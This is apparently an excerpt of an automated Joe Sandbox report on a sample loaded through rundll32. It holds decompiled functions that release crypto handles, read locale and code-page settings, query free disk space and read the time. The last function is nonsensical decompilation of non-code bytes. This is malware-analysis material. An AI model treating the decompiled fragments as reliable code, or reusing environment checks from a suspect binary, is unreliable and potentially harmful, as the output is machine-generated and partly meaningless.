                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 001C2DAA
                                            • CryptDestroyKey.ADVAPI32(00000000), ref: 001C2DC1
                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 001C2DDA
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Crypt$Destroy$ContextHashRelease
                                            • String ID:
                                            • API String ID: 3577760690-0
                                            • Opcode ID: 9f977589229de4b6b405a3f1990b6dad0a2c6419759c5f7e3878db6b5eb648ae
                                            • Instruction ID: 43df610eb92f586abccb3463cecde9d6d4d36afff5c0e0b023f089d6f38fc795
                                            • Opcode Fuzzy Hash: 9f977589229de4b6b405a3f1990b6dad0a2c6419759c5f7e3878db6b5eb648ae
                                            • Instruction Fuzzy Hash: CCF0A5B5944208EBEF24CFE4D95CFEDBBB4AB24305F108488E60667790C7798A94DF51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 58%
                                            			E001C2D55() {
                                            				void* _t17;
                                            
                                            				if( *(_t17 - 4) != 0) {
                                            					__imp__CryptDestroyHash( *(_t17 - 4));
                                            					 *(_t17 - 4) = 0;
                                            				}
                                            				if( *(_t17 - 0xc) != 0) {
                                            					CryptDestroyKey( *(_t17 - 0xc));
                                            					 *(_t17 - 0xc) = 0;
                                            				}
                                            				if( *(_t17 - 8) != 0) {
                                            					CryptReleaseContext( *(_t17 - 8), 0);
                                            					 *(_t17 - 8) = 0;
                                            				}
                                            				return  *((intOrPtr*)(_t17 - 0x10));
                                            			}




                                            APIs
                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 001C2DAA
                                            • CryptDestroyKey.ADVAPI32(00000000), ref: 001C2DC1
                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 001C2DDA
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Crypt$Destroy$ContextHashRelease
                                            • String ID:
                                            • API String ID: 3577760690-0
                                            • Opcode ID: b9cef658cc9a76aba9b45eb3e7ef16ef8b133b95413b36529222cf6954162521
                                            • Instruction ID: 43df610eb92f586abccb3463cecde9d6d4d36afff5c0e0b023f089d6f38fc795
                                            • Opcode Fuzzy Hash: b9cef658cc9a76aba9b45eb3e7ef16ef8b133b95413b36529222cf6954162521
                                            • Instruction Fuzzy Hash: CCF0A5B5944208EBEF24CFE4D95CFEDBBB4AB24305F108488E60667790C7798A94DF51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 58%
                                            			E001C2D78() {
                                            				void* _t17;
                                            
                                            				if( *(_t17 - 4) != 0) {
                                            					__imp__CryptDestroyHash( *(_t17 - 4));
                                            					 *(_t17 - 4) = 0;
                                            				}
                                            				if( *(_t17 - 0xc) != 0) {
                                            					CryptDestroyKey( *(_t17 - 0xc));
                                            					 *(_t17 - 0xc) = 0;
                                            				}
                                            				if( *(_t17 - 8) != 0) {
                                            					CryptReleaseContext( *(_t17 - 8), 0);
                                            					 *(_t17 - 8) = 0;
                                            				}
                                            				return  *((intOrPtr*)(_t17 - 0x10));
                                            			}




                                            APIs
                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 001C2DAA
                                            • CryptDestroyKey.ADVAPI32(00000000), ref: 001C2DC1
                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 001C2DDA
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Crypt$Destroy$ContextHashRelease
                                            • String ID:
                                            • API String ID: 3577760690-0
                                            • Opcode ID: 768a2efe29179f96dd2c15f3f714223f4e04de0ad962a490e514dfea00a22aac
                                            • Instruction ID: 43df610eb92f586abccb3463cecde9d6d4d36afff5c0e0b023f089d6f38fc795
                                            • Opcode Fuzzy Hash: 768a2efe29179f96dd2c15f3f714223f4e04de0ad962a490e514dfea00a22aac
                                            • Instruction Fuzzy Hash: CCF0A5B5944208EBEF24CFE4D95CFEDBBB4AB24305F108488E60667790C7798A94DF51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 46%
                                            			E0018A9A0(int __eax, void* __ebx, void* __eflags) {
                                            				char _v11;
                                            				char _v16;
                                            				intOrPtr _t28;
                                            				void* _t31;
                                            				void* _t33;
                                            
                                            				_t33 = __eflags;
                                            				_v16 = 0;
                                            				_push(_t31);
                                            				_push(0x18aa04);
                                            				_push( *[fs:edx]);
                                            				 *[fs:edx] = _t31 + 0xfffffff4;
                                            				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
                                            				E00183BF0( &_v16, 7,  &_v11);
                                            				_push(_v16);
                                            				E00186AC0(7, GetACP(), _t33);
                                            				_pop(_t28);
                                            				 *[fs:eax] = _t28;
                                            				_push(E0018AA0B);
                                            				return E00183980( &_v16);
                                            			}








                                            APIs
                                            • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0018AA04), ref: 0018A9C6
                                            • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0018AA04), ref: 0018A9DF
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: InfoLocale
                                            • String ID:
                                            • API String ID: 2299586839-0
                                            • Opcode ID: 8a0f145cb963d217eaff7a73a0b5f9e12f7a49f92de52e34c7238e0e5b79e31f
                                            • Instruction ID: f50fb5c2a140fd6f704e199e14ef98e6d6143caebfc39f66eb4fca77feceab1d
                                            • Opcode Fuzzy Hash: 8a0f145cb963d217eaff7a73a0b5f9e12f7a49f92de52e34c7238e0e5b79e31f
                                            • Instruction Fuzzy Hash: FBF09071E04708BFEB04FBA1C85299EB3ABEBC8B14F90C865B510D7681EB7967048F50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00186E8A(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                            				long _v8;
                                            				long _v12;
                                            				long _v16;
                                            				long _v20;
                                            				intOrPtr _v24;
                                            				signed int _v28;
                                            				CHAR* _t25;
                                            				int _t26;
                                            				intOrPtr _t31;
                                            				intOrPtr _t34;
                                            				intOrPtr* _t39;
                                            				intOrPtr* _t40;
                                            				intOrPtr _t48;
                                            				intOrPtr _t50;
                                            
                                            				_t25 = _a4;
                                            				if(_t25 == 0) {
                                            					_t25 = 0;
                                            				}
                                            				_t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
                                            				_v28 = _v8 * _v12;
                                            				_v24 = 0;
                                            				_t48 = _v24;
                                            				_t31 = E00184580(_v28, _t48, _v16, 0);
                                            				_t39 = _a8;
                                            				 *_t39 = _t31;
                                            				 *((intOrPtr*)(_t39 + 4)) = _t48;
                                            				_t50 = _v24;
                                            				_t34 = E00184580(_v28, _t50, _v20, 0);
                                            				_t40 = _a12;
                                            				 *_t40 = _t34;
                                            				 *((intOrPtr*)(_t40 + 4)) = _t50;
                                            				return _t26;
                                            			}

















                                            APIs
                                            • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 00186EAD
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: DiskFreeSpace
                                            • String ID:
                                            • API String ID: 1705453755-0
                                            • Opcode ID: b02226f70f1faef854ad1d2873c877cceed355fa1559f2fe83d1c1a34bbe3657
                                            • Instruction ID: 7ebe96205df1c1685f076f0b9bfd8f1f10e75a3b7385c65859e945e9ee0f68dd
                                            • Opcode Fuzzy Hash: b02226f70f1faef854ad1d2873c877cceed355fa1559f2fe83d1c1a34bbe3657
                                            • Instruction Fuzzy Hash: FE11CCB5A01209AFDB04DFA9C8819AFB7F9EFC8710B14C569E509E7254E6319E018BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 51%
                                            			E001852EE(int __eax, void* __ebx, void* __eflags) {
                                            				char _v8;
                                            				char _v15;
                                            				char _v20;
                                            				intOrPtr _t29;
                                            				void* _t32;
                                            
                                            				_v20 = 0;
                                            				_push(_t32);
                                            				_push(0x185356);
                                            				_push( *[fs:edx]);
                                            				 *[fs:edx] = _t32 + 0xfffffff0;
                                            				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
                                            				E00183BF0( &_v20, 7,  &_v15);
                                            				E001828D8(_v20,  &_v8);
                                            				if(_v8 != 0) {
                                            				}
                                            				_pop(_t29);
                                            				 *[fs:eax] = _t29;
                                            				_push(E0018535D);
                                            				return E00183980( &_v20);
                                            			}








                                            APIs
                                            • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00185356), ref: 00185316
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: InfoLocale
                                            • String ID:
                                            • API String ID: 2299586839-0
                                            • Opcode ID: 8b2b844bccb24670146370084169b074dbcf6b974fd3c4a463578f67c9a69e20
                                            • Instruction ID: 722a54c4382752da06b96997a0c09a12a52e68e3f2e1910a007b69f51460edb6
                                            • Opcode Fuzzy Hash: 8b2b844bccb24670146370084169b074dbcf6b974fd3c4a463578f67c9a69e20
                                            • Instruction Fuzzy Hash: 6FF0AF31A04609AFEB15EEA0CC42AAEB3BAFB85710F408875B51096180E7B42B048B90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 51%
                                            			E001852F0(int __eax, void* __ebx, void* __eflags) {
                                            				char _v8;
                                            				char _v15;
                                            				char _v20;
                                            				intOrPtr _t29;
                                            				void* _t32;
                                            
                                            				_v20 = 0;
                                            				_push(_t32);
                                            				_push(0x185356);
                                            				_push( *[fs:edx]);
                                            				 *[fs:edx] = _t32 + 0xfffffff0;
                                            				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
                                            				E00183BF0( &_v20, 7,  &_v15);
                                            				E001828D8(_v20,  &_v8);
                                            				if(_v8 != 0) {
                                            				}
                                            				_pop(_t29);
                                            				 *[fs:eax] = _t29;
                                            				_push(E0018535D);
                                            				return E00183980( &_v20);
                                            			}








                                            APIs
                                            • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00185356), ref: 00185316
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: InfoLocale
                                            • String ID:
                                            • API String ID: 2299586839-0
                                            • Opcode ID: 542ddb2c71f480962634d6471e5ef910313239e592cc84853697d6e5c36eb115
                                            • Instruction ID: d82e671aacb772c5fca3cf2537049ee9532c7943f52f90a7395d826741204beb
                                            • Opcode Fuzzy Hash: 542ddb2c71f480962634d6471e5ef910313239e592cc84853697d6e5c36eb115
                                            • Instruction Fuzzy Hash: 32F0C231E04609AFEB15FFA0CC42AEEB3BAFB85710F408875E51097180E7B42B04CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0018954C(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
                                            				char _v260;
                                            				intOrPtr _t10;
                                            				void* _t18;
                                            
                                            				_t18 = __ecx;
                                            				_t10 = _a4;
                                            				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
                                            					return E001839D4(_t10, _t18);
                                            				}
                                            				return E00183A70(_t10, _t5 - 1,  &_v260);
                                            			}






                                            APIs
                                            • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0018956A
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: InfoLocale
                                            • String ID:
                                            • API String ID: 2299586839-0
                                            • Opcode ID: daa0f04e3b6fc9fee6beaaab3731d9ef3a10f1e37d0f029353fce0ae8f944a0e
                                            • Instruction ID: 19c854ef76aad34629e501d1242227a5e2b2e490f1ec2df626c2e1c6cb826547
                                            • Opcode Fuzzy Hash: daa0f04e3b6fc9fee6beaaab3731d9ef3a10f1e37d0f029353fce0ae8f944a0e
                                            • Instruction Fuzzy Hash: B6E0D83170421417D315B5588C869F7B35C9768750F0442ABB94AD7341EFA0DF444BE4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 79%
                                            			E00189598(int __eax, char __ecx, int __edx) {
                                            				char _v16;
                                            				char _t5;
                                            				char _t6;
                                            
                                            				_push(__ecx);
                                            				_t6 = __ecx;
                                            				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
                                            					_t5 = _t6;
                                            				} else {
                                            					_t5 = _v16;
                                            				}
                                            				return _t5;
                                            			}

                                            APIs
                                            • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0018ACB2,00000000,0018AECB,?,?,00000000,00000000), ref: 001895AB
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: InfoLocale
                                            • String ID:
                                            • API String ID: 2299586839-0
                                            • Opcode ID: 33eb2210463a6f1f168751addeaa6af0f9de91085a939ca5f58f3c90521b225a
                                            • Instruction ID: ff70b8193f82784eeca78e4be1bc01ee9cbfba50ef89f53b9b9e6a5ba479737f
                                            • Opcode Fuzzy Hash: 33eb2210463a6f1f168751addeaa6af0f9de91085a939ca5f58f3c90521b225a
                                            • Instruction Fuzzy Hash: 8BD05E6630D2506AE315615A2D85DBB5BDCCBC57A1F14403AF549C6202D300CD079BB1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0018804C() {
                                            				struct _SYSTEMTIME* _t2;
                                            
                                            				GetLocalTime(_t2);
                                            				return _t2->wYear;
                                            			}

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: LocalTime
                                            • String ID:
                                            • API String ID: 481472006-0
                                            • Opcode ID: 50d6a5481d7768f6b4a1c687c5b9d256e6741df9c770a815e9e82967501f0aed
                                            • Instruction ID: 11a93e35c2171e02a60ee79d2a5c300eb9d46f3badcb68ada5ac8717affc564d
                                            • Opcode Fuzzy Hash: 50d6a5481d7768f6b4a1c687c5b9d256e6741df9c770a815e9e82967501f0aed
                                            • Instruction Fuzzy Hash: 7BA0120C404C0141C24033180C0315531019910660FC4474068F8003D1EB19022046E7
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 66%
                                            			E0018B4CE(void* __eax, signed int __ebx, signed int* __ecx, signed char* __edx, void* __esi, void* __fp0) {
                                            				signed char _t90;
                                            				signed int _t93;
                                            				signed char _t96;
                                            				signed int _t97;
                                            				signed char _t98;
                                            				signed int _t99;
                                            				signed int _t100;
                                            				signed int _t102;
                                            				signed int _t103;
                                            				signed char _t108;
                                            				signed char _t109;
                                            				signed char _t111;
                                            				void* _t113;
                                            				signed int _t114;
                                            				signed int _t115;
                                            				signed int _t116;
                                            				signed char _t118;
                                            				signed char _t119;
                                            				signed char _t120;
                                            				void* _t124;
                                            				signed char _t127;
                                            				void* _t128;
                                            				signed char _t129;
                                            				signed int _t130;
                                            				signed int _t137;
                                            				signed char _t138;
                                            				signed char _t186;
                                            				signed char _t190;
                                            				signed char _t194;
                                            				signed char _t196;
                                            				signed int _t201;
                                            				signed int _t205;
                                            				signed int _t206;
                                            				signed int _t207;
                                            				signed int _t208;
                                            				intOrPtr _t221;
                                            				intOrPtr _t222;
                                            				intOrPtr _t223;
                                            				intOrPtr _t224;
                                            				intOrPtr _t225;
                                            				intOrPtr _t226;
                                            				intOrPtr _t227;
                                            				intOrPtr _t228;
                                            				intOrPtr _t229;
                                            				intOrPtr _t230;
                                            				intOrPtr _t231;
                                            				void* _t233;
                                            				void* _t235;
                                            				void* _t237;
                                            				intOrPtr _t243;
                                            
                                            				asm("sbb eax, 0x8000000");
                                            				_t90 = __eax + __eax ^ 0x00000019;
                                            				 *_t90 =  *_t90 + _t90;
                                            				_t190 = __ebx ^  *__ecx ^  *__ecx;
                                            				 *((intOrPtr*)(_t235 + __esi + 0x19)) =  *((intOrPtr*)(_t235 + __esi + 0x19)) + _t190;
                                            				_t93 = _t90 + _t190 + __edx + __edx;
                                            				 *_t93 =  *_t93 + __ecx;
                                            				asm("sbb [eax], eax");
                                            				asm("sbb al, 0x35");
                                            				asm("sbb [eax], eax");
                                            				asm("loopne 0x34");
                                            				asm("sbb [eax], eax");
                                            				asm("sbb [eax], eax");
                                            				asm("sbb [eax], eax");
                                            				_push(0xd0001934);
                                            				_t194 = _t190 ^  *__ecx ^  *__ecx ^  *__ecx ^  *__ecx;
                                            				 *((intOrPtr*)(_t194 + __esi + 0x32c80019)) =  *((intOrPtr*)(_t194 + __esi + 0x32c80019)) + __ecx;
                                            				asm("sbb [eax], eax");
                                            				asm("invalid");
                                            				_t96 = ((_t93 ^ 0x32e80019) & 0x00000034) + ((_t93 ^ 0x32e80019) & 0x00000034);
                                            				 *((intOrPtr*)(_t96 - 0x47ffe6cc)) =  *((intOrPtr*)(_t96 - 0x47ffe6cc)) + __ecx;
                                            				_t196 = _t194 ^  *__ecx ^  *__ecx;
                                            				 *((intOrPtr*)(_t235 + __esi + 0x19)) =  *((intOrPtr*)(_t235 + __esi + 0x19)) + __ecx;
                                            				 *((intOrPtr*)(_t96 + 0x54001932)) =  *((intOrPtr*)(_t96 + 0x54001932)) + __edx;
                                            				_t97 = _t96 ^ 0x00000019;
                                            				 *((intOrPtr*)(_t97 + 0x4c001932)) =  *((intOrPtr*)(_t97 + 0x4c001932)) + __ecx;
                                            				_t98 = _t97 ^ 0x32a00019;
                                            				asm("sbb [eax], eax");
                                            				_t99 = _t98 ^ 0x00000019;
                                            				 *((intOrPtr*)(_t99 + 0x7c001932)) =  *((intOrPtr*)(_t99 + 0x7c001932)) + _t196;
                                            				_t100 = _t99 ^ 0x32900019;
                                            				asm("sbb [eax], eax");
                                            				asm("aam 0x34");
                                            				asm("sbb [eax], eax");
                                            				 *__edx = __edx;
                                            				asm("sbb [eax], eax");
                                            				 *(__ecx + _t196) =  *(__ecx + _t196) << 0;
                                            				 *__edx =  *__edx ^ 0x00000019;
                                            				 *((intOrPtr*)(_t233 + __esi + 0x32780019)) =  *((intOrPtr*)(_t233 + __esi + 0x32780019)) + _t100;
                                            				asm("sbb [eax], eax");
                                            				 *((intOrPtr*)(_t100 + 0x34)) =  *((intOrPtr*)(_t100 + 0x34)) + _t100;
                                            				asm("sbb [eax], eax");
                                            				asm("sbb [eax], eax");
                                            				_t102 = 0x50001932;
                                            				_t103 = _t102 ^ 0x32580019;
                                            				asm("sbb [eax], eax");
                                            				asm("sbb [ecx+ebx], dh");
                                            				 *((intOrPtr*)(_t103 + 0x32)) =  *((intOrPtr*)(_t103 + 0x32)) + __edx;
                                            				asm("sbb [eax], eax");
                                            				asm("hlt");
                                            				 *((intOrPtr*)(_t103 + 0x32)) =  *((intOrPtr*)(_t103 + 0x32)) + __ecx;
                                            				asm("sbb [eax], eax");
                                            				 *((intOrPtr*)(__esi + 0x32380019)) =  *((intOrPtr*)(__esi + 0x32380019)) + _t103;
                                            				asm("sbb [eax], eax");
                                            				 *0x30001968 =  *((intOrPtr*)(0x30001968)) + __ecx;
                                            				asm("sbb [eax], eax");
                                            				 *__edx =  *__edx - __edx;
                                            				asm("sbb [eax], eax");
                                            				_t237 = 0x70001935;
                                            				 *0x30001933 =  *0x30001933 + __ecx;
                                            				 *0x30001933 =  *0x30001933 + 0x3000192a;
                                            				 *0x30001933 =  *0x30001933 + 0x3000192a;
                                            				_t201 = _t196 ^  *__ecx ^  *__ecx ^  *__ecx ^  *__ecx ^  *__ecx;
                                            				 *((intOrPtr*)(__esi + 0x19)) =  *((intOrPtr*)(__esi + 0x19)) + _t201;
                                            				 *0x30001933 =  *0x30001933 + 0x3000192a;
                                            				asm("sbb al, 0x32");
                                            				asm("sbb [eax], eax");
                                            				asm("sbb [eax], eax");
                                            				 *0x30001933 =  *0x30001933 + 0x3000192a;
                                            				 *0x30001933 =  *0x30001933 + 0x3000192a;
                                            				asm("sbb [edx], dh");
                                            				asm("sbb [eax], eax");
                                            				asm("cld");
                                            				 *0x30001933 =  *0x30001933 + 0x30001933;
                                            				 *0x30001933 =  *0x30001933 + 0x30001933;
                                            				__edx[__esi] =  &(__edx[__edx[__esi]]);
                                            				asm("sbb [eax], eax");
                                            				asm("les esi, [ebx]");
                                            				asm("sbb [eax], eax");
                                            				 *0x30001933 =  *0x30001933 + 0x30001933;
                                            				 *0x30001933 =  *0x30001933 + 0x30001933;
                                            				asm("adc [edx], dh");
                                            				asm("sbb [eax], eax");
                                            				 *((intOrPtr*)(__ecx + _t201)) =  *((intOrPtr*)(__ecx + _t201)) + __edx;
                                            				 *0x30001933 =  *0x30001933 + 0x30001933;
                                            				 *0x30001933 =  *0x30001933 + 0x30001933;
                                            				__edx[__esi] = __ecx + __edx[__esi];
                                            				asm("sbb [eax], eax");
                                            				asm("clc");
                                            				 *0x30001933 =  *0x30001933 + 0x30001933;
                                            				 *0x30001933 =  *0x30001933 + 0x30001933;
                                            				 *0x30001933 =  *0x30001933 + __ecx;
                                            				 *0x30001933 =  *0x30001933 + 0x60003266;
                                            				 *((intOrPtr*)(0x60003266)) =  *((intOrPtr*)(0x60003266)) + 0x60003266;
                                            				__edx[__esi] = __edx[__esi] + 0x60003266;
                                            				asm("sbb [eax], eax");
                                            				_t108 = _t98;
                                            				_t109 = _t108 ^ 0x00000019;
                                            				 *0x30001933 =  *0x30001933 + _t109;
                                            				 *0x30001933 =  *0x30001933 + _t109;
                                            				 *0x30001933 =  *0x30001933 + _t109;
                                            				_t205 = _t201 ^  *__ecx ^  *__ecx ^  *__ecx ^  *__ecx;
                                            				_t111 =  &(__edx[_t109]) ^ 0x00000019;
                                            				 *0x30001933 =  *0x30001933 + _t111;
                                            				 *0x30001933 =  *0x30001933 + _t111;
                                            				 *__ecx =  *__ecx ^ _t205;
                                            				_t113 = _t111 + _t205 + _t205;
                                            				_t206 = _t205 ^  *__ecx;
                                            				 *0x30001933 =  *0x30001933 + _t113;
                                            				 *0x30001933 =  *0x30001933 + _t113;
                                            				_t114 = _t113 + _t206;
                                            				 *__ecx =  *__ecx ^ _t206;
                                            				 *((intOrPtr*)(0x40001934 + __esi + 0x19)) =  *((intOrPtr*)(0x40001934 + __esi + 0x19)) + __edx;
                                            				 *0x30001933 =  *0x30001933 + _t114;
                                            				asm("hlt");
                                            				 *__ecx =  *__ecx ^ _t206;
                                            				 *0x30001933 =  *0x30001933 + _t206;
                                            				_t115 = _t114 ^ 0x00000019;
                                            				 *0x30001933 =  *0x30001933 + _t115;
                                            				asm("lock xor [ecx], ebx");
                                            				 *0x30001933 =  *0x30001933 + __edx;
                                            				_t116 = _t115 ^ 0x00000019;
                                            				 *0x30001933 =  *0x30001933 + _t116;
                                            				asm("in al, dx");
                                            				 *__ecx =  *__ecx ^ _t206;
                                            				_t118 = _t116 + _t206 ^ 0x00000019;
                                            				 *0x30001933 =  *0x30001933 + _t118;
                                            				 *0x30001933 =  *0x30001933 + _t118;
                                            				_t119 = __ecx + _t118;
                                            				 *__ecx =  *__ecx ^ _t206;
                                            				 *0x30001967 =  *((intOrPtr*)(0x30001967)) + __ecx;
                                            				asm("sbb [eax], eax");
                                            				 *0x30001933 =  *0x30001933 + _t119;
                                            				 *0x30001933 =  *0x30001933 + _t119;
                                            				asm("in al, 0x31");
                                            				asm("sbb [eax], eax");
                                            				_t120 = _t119 ^ 0x00000034;
                                            				asm("sbb [eax], eax");
                                            				 *0x30001933 =  *0x30001933 + _t120;
                                            				 *0x30001933 =  *0x30001933 + _t120;
                                            				asm("loopne 0x33");
                                            				asm("sbb [eax], eax");
                                            				 *_t206 =  *_t206 << 0x19;
                                            				 *0x30001933 =  *0x30001933 + _t120;
                                            				 *0x30001933 =  *0x30001933 + _t120;
                                            				 *__ecx =  *__ecx ^ _t206;
                                            				 *((intOrPtr*)(__esi + 0x19)) =  *((intOrPtr*)(__esi + 0x19)) + __ecx;
                                            				 *0x30001933 =  *0x30001933 + _t120 + _t206;
                                            				asm("sbb [eax], eax");
                                            				 *0x30001933 =  *0x30001933 + 0x3000192a;
                                            				 *0x30001933 =  *0x30001933 + 0x3000192a;
                                            				_t124 = 0x3000192a + __edx;
                                            				 *__ecx =  *__ecx ^ _t206;
                                            				 *((intOrPtr*)(0x40001934 + __esi)) =  *((intOrPtr*)(0x40001934 + __esi)) + __ecx;
                                            				asm("sbb [eax], eax");
                                            				 *0x30001933 =  *0x30001933 + _t124;
                                            				 *0x30001933 =  *0x30001933 + _t124;
                                            				 *__ecx =  *__ecx << 1;
                                            				asm("sbb [eax], eax");
                                            				 *((char*)(__ecx + _t206)) = __edx;
                                            				 *0x30001933 =  *0x30001933 + _t124;
                                            				 *0x30001933 =  *0x30001933 + _t124;
                                            				 *__ecx =  *__ecx ^ _t206;
                                            				_t127 = _t124 + __ecx + __ecx ^ 0x00000019;
                                            				 *0x30001933 =  *0x30001933 + _t127;
                                            				 *0x30001933 =  *0x30001933 + _t127;
                                            				_t128 = __ecx + _t127;
                                            				 *__ecx =  *__ecx ^ _t206;
                                            				 *0x30003267 =  *((intOrPtr*)(0x30003267)) + __edx;
                                            				 *0x30001933 =  *0x30001933 + _t128;
                                            				_t129 = _t128 + _t128;
                                            				 *__ecx =  *__ecx ^ _t206;
                                            				 *((intOrPtr*)(0x40001934 + __esi)) =  *((intOrPtr*)(_t237 + __esi)) + _t206;
                                            				asm("sbb [eax], eax");
                                            				 *0x30001933 =  *0x30001933 + _t129;
                                            				 *0x30001933 =  *0x30001933 + _t129;
                                            				 *__ecx =  *__ecx << 0x19;
                                            				 *((intOrPtr*)(_t206 + __esi + 0x19)) =  *((intOrPtr*)(_t206 + __esi + 0x19)) + _t206;
                                            				 *0x30001933 =  *0x30001933 + _t129;
                                            				_t130 = _t129 ^ 0x00000019;
                                            				 *0x30001933 =  *0x30001933 + _t130;
                                            				 *0x30001933 =  *0x30001933 + _t130;
                                            				 *0x8C003264 =  *((intOrPtr*)(0x8c003264)) + _t206;
                                            				 *0x30001933 =  *0x30001933 + (_t130 ^ 0x00000019);
                                            				asm("sbb [eax], eax");
                                            				 *0x30001933 =  *0x30001933 + 0x31;
                                            				asm("sbb [eax], eax");
                                            				asm("sbb [eax], eax");
